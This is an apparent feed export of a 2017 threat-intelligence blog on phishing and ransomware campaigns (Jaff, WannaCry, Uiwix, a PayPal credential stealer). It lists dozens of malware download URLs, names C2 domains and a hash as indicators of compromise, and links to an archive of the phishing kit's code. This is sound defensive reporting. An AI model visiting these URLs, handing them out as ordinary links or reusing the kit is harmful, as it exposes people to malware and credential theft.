tag:blogger.com,1999:blog-4334125576902999932024-03-13T07:49:23.799-07:00Phish Central Unknownnoreply@blogger.comBlogger32125tag:blogger.com,1999:blog-433412557690299993.post-49322438741068279872017-06-05T14:16:00.001-07:002017-06-05T14:16:21.125-07:00NEWS: Another Spy Program Leaked onto the Dark Web, Second Web Attack ImminentThe WannaCry ransomware infected over 300,000 computers worldwide including those operated by the National Health Service of the UK, the Russian government and multi-billion dollar corporations in merely a week. This week, several publications including the Financial Times and the Sun have reported that yet another global ransomware attack is imminent.<br />
<a href="https://www.deepdotweb.com/2017/06/03/another-spy-program-leaked-onto-dark-web-second-web-attack-imminent/?utm_source=hs_email&utm_medium=email&utm_content=52697792&_hsenc=p2ANqtz-9J0784BGYEvTn12BHZH-C4FQZDi7dbztsuIT2eG5ovQaClK6U9vLGxgumtN1js9byZzX7krMXLls_y7R1EOb6SgfRh3Q&_hsmi=52697792" target="_blank">Full story here.</a> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://agentmail.com.au/wp-content/uploads/data-numbers-ss-1920.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="800" height="360" src="https://agentmail.com.au/wp-content/uploads/data-numbers-ss-1920.jpg" width="640" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-84115194032643762962017-05-30T14:28:00.001-07:002017-05-30T14:28:15.091-07:00NEWS: New tool for converting Shodan CSV into usable new files. This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (eg. ThreatConnect etc). You can grab the IOCs column (eg. IPs) and create a new csv file with just that column - this new CSV can then be ingested into any other platform.<br />
<a href="http://rakshatec.blogspot.com.au/2017/05/python-converting-shodan-csv-into-iocs.html" target="_blank">Read the full article here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-r4G2uNZnHas/WS3jR6ECM1I/AAAAAAAAMxQ/_X1c0dnQq5wa4jZUtfTRVY7MinyWAD6EQCLcB/s400/convert.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="285" data-original-width="400" height="285" src="https://4.bp.blogspot.com/-r4G2uNZnHas/WS3jR6ECM1I/AAAAAAAAMxQ/_X1c0dnQq5wa4jZUtfTRVY7MinyWAD6EQCLcB/s400/convert.png" width="400" /></a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-43531548245870261992017-05-29T14:17:00.002-07:002017-05-29T14:17:47.247-07:00NEWS: E-mails phished from Russian critic were “tainted” before being leakedArsTechnica.com reports: E-mails stolen in a phishing attack on a prominent critic of Russian
President Vladimir Putin were manipulated before being published on the
Internet. That's according to a report published Thursday, which also
asserts that the e-mails were manipulated in order to discredit a steady
stream of unfavorable articles.<br />
<a href="https://arstechnica.com/security/2017/05/e-mails-phished-from-russian-critic-were-tainted-before-being-leaked/" target="_blank">Read the full story here.</a> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://cdn.arstechnica.net/wp-content/uploads/2017/05/slatter-phish-800x488.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="800" height="243" src="https://cdn.arstechnica.net/wp-content/uploads/2017/05/slatter-phish-800x488.png" width="400" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-60873227185052228322017-05-25T18:13:00.000-07:002017-05-25T18:13:04.722-07:00NEWS: New RansomWare WIDIA - asks for credit card payment<h1 class="entry-title">
<span style="font-weight: normal;"><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">New “Widia” Ransomware Asks for Credit Card for Payment. </span></span></span></h1>
<h1 class="entry-title">
<span style="font-weight: normal;"><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">SentinelOne detects this malware behaviorally and our customers are
protected despite the lack of significant, or apparent, malicious
behavior.</span></span></span></h1>
<h1 class="entry-title">
<span style="font-weight: normal;"><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><a href="https://sentinelone.com/blogs/new-widia-ransomware-asks-credit-card-payment/" target="_blank">Full story here</a>. </span></span></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://sentinelone.com/wp-content/uploads/ransom.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="600" height="266" src="https://sentinelone.com/wp-content/uploads/ransom.gif" width="400" /></a></div>
<h1 class="entry-title">
<span style="font-weight: normal;"><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></span></h1>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-56197751453533443612017-05-25T17:15:00.001-07:002017-05-25T17:15:18.063-07:00Phishing: JAFF ransomware | PDF | DOCMThis campaign is serving Jaff Ransomware. The attachment is a PDF which has an embedded DOCM that calls out to the C2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zYSHKYV1YFA/WSdzfn-axGI/AAAAAAAAAIk/hbC0G0dQIb8YV3MygkNNV_LkfJVoTN2GwCLcB/s1600/Screen%2BShot%2B2017-05-26%2Bat%2B10.09.01%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="604" data-original-width="860" height="280" src="https://2.bp.blogspot.com/-zYSHKYV1YFA/WSdzfn-axGI/AAAAAAAAAIk/hbC0G0dQIb8YV3MygkNNV_LkfJVoTN2GwCLcB/s400/Screen%2BShot%2B2017-05-26%2Bat%2B10.09.01%2Bam.png" width="400" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-14708744393750288302017-05-25T17:13:00.001-07:002017-05-25T17:13:06.073-07:00Phishing: SCAM/Recon campaignThis one is trying for you to get in touch with them and start a conversation. Most likely Scam.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2xECJXKFpIU/WSdzA_EB3UI/AAAAAAAAAIc/RDCzD8G7nBEGrLYJYIUgBPbM1xnEbYLkQCLcB/s1600/Screenshot%2Bfrom%2B2017-05-26%2B10-01-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="307" data-original-width="418" height="293" src="https://1.bp.blogspot.com/-2xECJXKFpIU/WSdzA_EB3UI/AAAAAAAAAIc/RDCzD8G7nBEGrLYJYIUgBPbM1xnEbYLkQCLcB/s400/Screenshot%2Bfrom%2B2017-05-26%2B10-01-08.png" width="400" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-16050814207231909072017-05-17T01:42:00.001-07:002017-05-17T01:43:19.689-07:00Phishing: Jaff Ransomware campaign through PDF > DOCMPhishing emails with PDF attachments that contain an embedded DOCM have been doing the rounds.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
Decompressed DOCM:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LSP3Jkz7TiA/WRwLbGILIEI/AAAAAAAAAIM/OCHd31zWVPgDi6-6iFRxYDY2QKVKsKP1ACLcB/s1600/Screen%2BShot%2B2017-05-17%2Bat%2B6.36.05%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://1.bp.blogspot.com/-LSP3Jkz7TiA/WRwLbGILIEI/AAAAAAAAAIM/OCHd31zWVPgDi6-6iFRxYDY2QKVKsKP1ACLcB/s400/Screen%2BShot%2B2017-05-17%2Bat%2B6.36.05%2Bpm.png" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Here's a list of known first stage URLs:<br />
<div>
<br /></div>
<div>
<pre>http://tiskr.com/f87346b
http://julian-g.ro/f87346b
http://phinamco.com/f87346b
http://trans-atm.com/f87346b</pre>
</div>
<div>
<pre>http://panaceya-n.ru/77g643
http://geo-zamer.ru/77g643
http://bellevillenorfolkterriers.co.uk/77g643
http://etadjewellery.com/77g643
http://jisrcenter.com/77g643
http://villa31.com/77g643
http://taddboxers.com/77g643
http://demelkwegtuk.nl/77g643
http://ws.osenilo.com/77g643
http://kitchenandgifts.com/77g643
http://takipediliyoruz.com/77g643
http://enboite.be/77g643
http://prystel.com/77g643
http://biolume.nl/77g643
http://koreancars-club.ru/77g643
http://thegoldclubs.com/77g643
http://pgringette.ca/77g643</pre>
<pre>http://tutmacli.com/hHGFjd
http://rooana.com/hHGFjd
http://ppapmoozamiz.com/hHGFjd
http://hrlpk.com/hHGFjd
http://hncdc.org/hHGFjd
http://dovahosting.com/hHGFjd
http://boolas.com/hHGFjd
http://bianshop.com/hHGFjd
http://byydei74fg43ff4f.net/af/hHGFjd
http://5hdnnd74fffrottd.com/af/hHGFjd
http://sjffonrvcik45bd.info/af/hHGFjd
http://fotografikum.com/hHGFjd
http://dcfarbicka.sk/hHGFjd
http://bizcleaning.co.uk/hHGFjd
http://dsintergrated.com/hHGFjd
http://vbplan.de/hHGFjd
http://diasgroup.sk/hHGFjd
http://ecbuyjp.com/hHGFjd
http://urachart.com/hHGFjd
http://ecuamiaflowers.com/hHGFjd
http://energybalancecenter.nl/hHGFjd
http://oyasinsaat.com.tr/hHGFjd</pre>
<pre></pre>
<pre></pre>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-31856681004467412302017-05-15T14:23:00.001-07:002017-05-15T14:32:05.598-07:00Malware: Uiwix Ransomware - new ransomware variant <span style="font-family: Trebuchet MS, sans-serif; font-size: medium;"><span style="background-color: #fefefe;">WannaCry distribution may have dropped, but </span><span style="background-color: #fefefe; box-sizing: border-box;">the ransomware pandemic is not over</span><span style="background-color: #fefefe;">.</span></span><br />
<span style="font-family: Trebuchet MS, sans-serif; font-size: medium;"><span style="background-color: #fefefe; box-sizing: border-box;">Uiwix</span><span style="background-color: #fefefe;">, </span><span style="background-color: #fefefe; box-sizing: border-box;">has begun to spread by exploiting the same vulnerability in Windows SMBv1 and SMBv2</span><span style="background-color: #fefefe;"> as WannaCry used.</span><span id="more-9857" style="background-color: #fefefe; box-sizing: border-box;"></span><span style="background-color: #fefefe;"> Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.</span></span><br />
<span style="font-family: Trebuchet MS, sans-serif; font-size: medium;"><span style="background-color: #fefefe;"><br /></span>
<span style="background-color: #fefefe;">Read the full story here at <a href="https://heimdalsecurity.com/blog/security-alert-uiwix-ransomware/" target="_blank">HEIMDAL</a>. </span></span><br />
<span style="background-color: #fefefe; color: #555555; font-family: "roboto" , sans-serif; font-size: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://heimdalsecurity.com/blog/wp-content/uploads/uiwix-ransom-note.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="322" src="https://heimdalsecurity.com/blog/wp-content/uploads/uiwix-ransom-note.png" width="400" /></a></div>
<span style="background-color: #fefefe; color: #555555; font-family: "roboto" , sans-serif; font-size: 16px;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-26014044750488567292017-05-14T18:34:00.002-07:002017-05-15T14:31:16.026-07:00Malware: WannaCry RansomWare - Infection Vector unlikely to be PhishingBy now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasn't been anything posted here on this sire regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world, based on the well-known SMBv1 vulnerability that was released by ShadowBrokers very recently. It is looking like the internet is being scanned for vulnerable computers and then attacked with the malware.<br />
<br />
Easy wins: <a href="https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012" target="_blank">disable SMB</a>, make sure you are not blocking the <a href="https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html" target="_blank">killSwitch</a>. <br />
<br />
There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.<br />
<br />
Here's a good <a href="https://www.renditioninfosec.com/2017/05/wanacrypt0r-malware-webcast-and-slides/" target="_blank">RE paper</a> from Jake Williams on the payload.<br />
And here's the <a href="https://www.renditioninfosec.com/download-tear-stopper/" target="_blank">tool</a> that you can use to prevent WannaCry infections if you cant patch your systems. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Ih4_J8sN6HA/WRbMeMbz8oI/AAAAAAAAsno/3_kD2_hIGYkw9K-IthRu2_fdE_xSm1UhwCLcB/s1600/wannacry-ransomware-attack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://1.bp.blogspot.com/-Ih4_J8sN6HA/WRbMeMbz8oI/AAAAAAAAsno/3_kD2_hIGYkw9K-IthRu2_fdE_xSm1UhwCLcB/s640/wannacry-ransomware-attack.png" width="640" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-43953330870187214872017-05-09T15:32:00.001-07:002017-05-09T23:55:57.042-07:00Phishing: PayPal theme 10 May 2017 | CredStealThis one is active currently - trying to lure victims into downloading and opening a HTML file, that fires up locally in the browser but POSTs information online, back to the c2 when the 'submit' button is hit, if the information matches the conditions in the script.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-RnPDSMxBlOo/WRI7BXupw_I/AAAAAAAAAHY/ktpLcZ9YR_8aT5367OepvoMGwatY7S50QCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.17%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="230" src="https://1.bp.blogspot.com/-RnPDSMxBlOo/WRI7BXupw_I/AAAAAAAAAHY/ktpLcZ9YR_8aT5367OepvoMGwatY7S50QCEw/s640/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.17%2Bam.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This what the email body looks like. </td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-VNw7jEFnYB0/WRI7BZaVRXI/AAAAAAAAAHY/15zzdAR697o8x4y56R_L1_nFzHuxTrajwCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.29%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="261" src="https://3.bp.blogspot.com/-VNw7jEFnYB0/WRI7BZaVRXI/AAAAAAAAAHY/15zzdAR697o8x4y56R_L1_nFzHuxTrajwCEw/s320/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.29%2Bam.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The HTML Attachment</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
Clever JS in the background makes the connection. It is obfuscated. </div>
<div>
The actual HTML content only loads if internet is available. The JS fetches the page contents and then displays them in the browser. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-EPuGTYoW5Fg/WRI7CBx2HUI/AAAAAAAAAHY/5vKFRsUA2BYIv2Jt4eDwmIwRqZTLt_AFgCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.27.56%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="223" src="https://3.bp.blogspot.com/-EPuGTYoW5Fg/WRI7CBx2HUI/AAAAAAAAAHY/5vKFRsUA2BYIv2Jt4eDwmIwRqZTLt_AFgCEw/s400/Screen%2BShot%2B2017-05-10%2Bat%2B7.27.56%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Locally saved html, loaded into a browser with internet avaialble</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The actual content is served from this server: <b>www.infosec1.net</b></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-ALFfTZJN5NE/WRJBhyVvAqI/AAAAAAAAAHk/7WzNThQMjIALgT6KPDKkrOtIA_C4tfo-wCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.04.46%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="245" src="https://1.bp.blogspot.com/-ALFfTZJN5NE/WRJBhyVvAqI/AAAAAAAAAHk/7WzNThQMjIALgT6KPDKkrOtIA_C4tfo-wCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.04.46%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PCAP of the request in the background</td></tr>
</tbody></table>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-PILyO9tLmYY/WRJBiOUUJfI/AAAAAAAAAHo/r5PwtKyuBKo1XOwOsXnMmBS2VDy3wpqxgCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.06.14%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://3.bp.blogspot.com/-PILyO9tLmYY/WRJBiOUUJfI/AAAAAAAAAHo/r5PwtKyuBKo1XOwOsXnMmBS2VDy3wpqxgCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.06.14%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The content served</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The whole HTML is encrypted and is only decrypted on the go in the browser. When decrypted, we can see the JS code that executes in the browser. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-gGiKCP3dUF8/WRI7D48yhbI/AAAAAAAAAHY/JkvOJOOeKUIvYWiG8EcXvn6TPqe9fd-jQCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.31.13%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="275" src="https://2.bp.blogspot.com/-gGiKCP3dUF8/WRI7D48yhbI/AAAAAAAAAHY/JkvOJOOeKUIvYWiG8EcXvn6TPqe9fd-jQCEw/s400/Screen%2BShot%2B2017-05-10%2Bat%2B7.31.13%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Code</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the c2 - http://www.<b>bootstrapcdn3.net</b>/e0445952.php and if the conditions are not met, it re-directs to legit PayPal site. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-W2Z2JI4iF54/WRJBjFz_pVI/AAAAAAAAAH0/92nuNzbkNvY0NiQssVnt7SgUpGDlNNlFACLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.31%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://1.bp.blogspot.com/-W2Z2JI4iF54/WRJBjFz_pVI/AAAAAAAAAH0/92nuNzbkNvY0NiQssVnt7SgUpGDlNNlFACLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.31%2Bam.png" width="381" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">One of the conditions. </td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ddZO5C9HiQ8/WRJBjJnkAPI/AAAAAAAAAHw/5-2QKndDcF8ao5Vee8w9wJWlM0GQUkshwCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.14%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://3.bp.blogspot.com/-ddZO5C9HiQ8/WRJBjJnkAPI/AAAAAAAAAHw/5-2QKndDcF8ao5Vee8w9wJWlM0GQUkshwCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.14%2Bam.png" width="382" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Final condition that directs the traffic</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs for this:</b></div>
<div>
www.infosec1.net</div>
<div>
www.bootstrapcdn3.net</div>
<div>
3061027594cf895b2e4a7ca0000f6bfe</div>
<div>
<br /></div>
<div>
Download the actual code <a href="https://drive.google.com/file/d/0B131CgkpMDDKWmRfNjFkemdueTg/view?usp=sharing" target="_blank">here</a>.<br />
File included are:<br />
<i>initial.html</i><br />
<i>script.js</i><br />
<i>decrypted-code.html</i><br />
<br /></div>
<div>
:)</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-90907342095354211862017-05-09T00:58:00.004-07:002017-05-09T00:59:43.737-07:00TUTORIAL: Using Shodan CLI | Downloading malware IOCs<span style="background-color: white; color: #3f3f3f; font-family: "dosis" , serif; font-size: 16px;">I started using then Shodan CLI for personal research into malware c2 hosts and found the new shodan tool malwareHunter to be very helpful.</span><br />
<span style="background-color: white; color: #3f3f3f; font-family: "dosis" , serif; font-size: 16px;">Thought I'd share with you guys how I use the API to grab the IOCs and then convert the JSON report into a CSV, which could then be used in many ways.</span><br />
<br />
<a href="http://rakshatec.blogspot.com.au/2017/05/using-shodan-cli-downloading-malware.html" target="_blank">Read the full tutorial here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-tsP1yAcBcnQ/WRFzNAuZLdI/AAAAAAAAMvs/KX8nYkANw4wKWWNJ7jZYzCqcsMmadERGgCLcB/s640/Screen%2BShot%2B2017-05-09%2Bat%2B4.17.48%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="134" src="https://4.bp.blogspot.com/-tsP1yAcBcnQ/WRFzNAuZLdI/AAAAAAAAMvs/KX8nYkANw4wKWWNJ7jZYzCqcsMmadERGgCLcB/s640/Screen%2BShot%2B2017-05-09%2Bat%2B4.17.48%2Bpm.png" width="640" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-59013634040315673222017-05-03T15:23:00.000-07:002017-05-09T01:00:06.442-07:00News: Shodan and Recorded Future release MalwareHunter, a C2 tracking toolShodan.io and Recorded Future have announced a new C2 tracking tool, built into Shodan that is accessible by anyone with a free Shodan.io account.<br />
<br />
Read info here: <a href="https://malware-hunter.shodan.io/" target="_blank">https://malware-hunter.shodan.io/</a><br />
<br />
Here is some more detail into what techniques they use: <a href="https://go.recordedfuture.com/hubfs/reports/threat-identification.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/threat-identification.pdf</a><br />
<br />
In shodan.io, simply search using this: category:malware<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: Times; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; margin: 0px; orphans: 2; text-align: center; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<a href="https://4.bp.blogspot.com/-tiCbIrZAIUE/WQpXZ09HuyI/AAAAAAAAAG4/7kOh60bOJMYor9ofsjV6tAgO7F36QA6CgCLcB/s1600/Screen%2BShot%2B2017-05-04%2Bat%2B8.11.59%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://4.bp.blogspot.com/-tiCbIrZAIUE/WQpXZ09HuyI/AAAAAAAAAG4/7kOh60bOJMYor9ofsjV6tAgO7F36QA6CgCLcB/s640/Screen%2BShot%2B2017-05-04%2Bat%2B8.11.59%2Bam.png" style="cursor: move;" width="640" /></a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-55686087885322194162017-05-01T14:30:00.000-07:002017-05-01T14:30:03.116-07:00Phishing: FedEx themed campaign targeting EUThis one is primarily targeted to Germany but there are versions of this run that are targeting every corner of the world.<br />
I wasn't able to grab the actual landing page in this case as it 404'd by the time I saw this. But here's some info about the campaign anyway.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ylw3MoXdkwI/WQeoHc0uWvI/AAAAAAAAAGE/quxW0jT2FFMBeemEcBlPIW9MEoWHLlJ5wCLcB/s1600/Screen%2BShot%2B2017-05-02%2Bat%2B7.22.10%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="297" src="https://1.bp.blogspot.com/-ylw3MoXdkwI/WQeoHc0uWvI/AAAAAAAAAGE/quxW0jT2FFMBeemEcBlPIW9MEoWHLlJ5wCLcB/s640/Screen%2BShot%2B2017-05-02%2Bat%2B7.22.10%2Bam.png" width="640" /></a><a href="https://1.bp.blogspot.com/-ylw3MoXdkwI/WQeoHc0uWvI/AAAAAAAAAGE/quxW0jT2FFMBeemEcBlPIW9MEoWHLlJ5wCLcB/s1600/Screen%2BShot%2B2017-05-02%2Bat%2B7.22.10%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Here's the actual URLs queried:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Il6-kXUgTAQ/WQeoi3-_xJI/AAAAAAAAAGI/FwGZuLaMdGIjhMq0YU0AnmhkL80w3KxLACLcB/s1600/Screen%2BShot%2B2017-05-02%2Bat%2B7.28.21%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://3.bp.blogspot.com/-Il6-kXUgTAQ/WQeoi3-_xJI/AAAAAAAAAGI/FwGZuLaMdGIjhMq0YU0AnmhkL80w3KxLACLcB/s400/Screen%2BShot%2B2017-05-02%2Bat%2B7.28.21%2Bam.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As stated above, the landing in this case 404'd so I couldn't get more info on exactly what this campaign is serving but anyway, good to know :)<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-47098105430469618352017-04-28T13:38:00.002-07:002017-04-28T13:40:20.655-07:00News: Another Day, Another Obfuscation Technique<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://isc.sans.edu/diaryimages/images/word20170428-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://isc.sans.edu/diaryimages/images/word20170428-1.png" /></a></div>
<br />
SANS ISC:<br />
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:<br />
<br />
<a href="https://isc.sans.edu/forums/diary/Another+Day+Another+Obfuscation+Technique/22354/" target="_blank">Read the full story here.</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-51574684270382472702017-04-27T23:17:00.001-07:002017-04-27T23:21:59.381-07:00News: Hacked: How $171 mn stolen from Union Bank was recovered<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.thehindu.com/news/national/article18063937.ece/alternates/FREE_660/th16bank" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://www.thehindu.com/news/national/article18063937.ece/alternates/FREE_660/th16bank" height="370" width="640" /></a><br />
<br />
Details emerge of how the money was retrieved from accounts in four different countries after government intervention.<br />
<br />
<a href="http://www.thehindu.com/news/national/hacked-how-171-mn-stolen-from-union-bank-was-recovered/article18063938.ece">Read the entire story here</a>. </div>
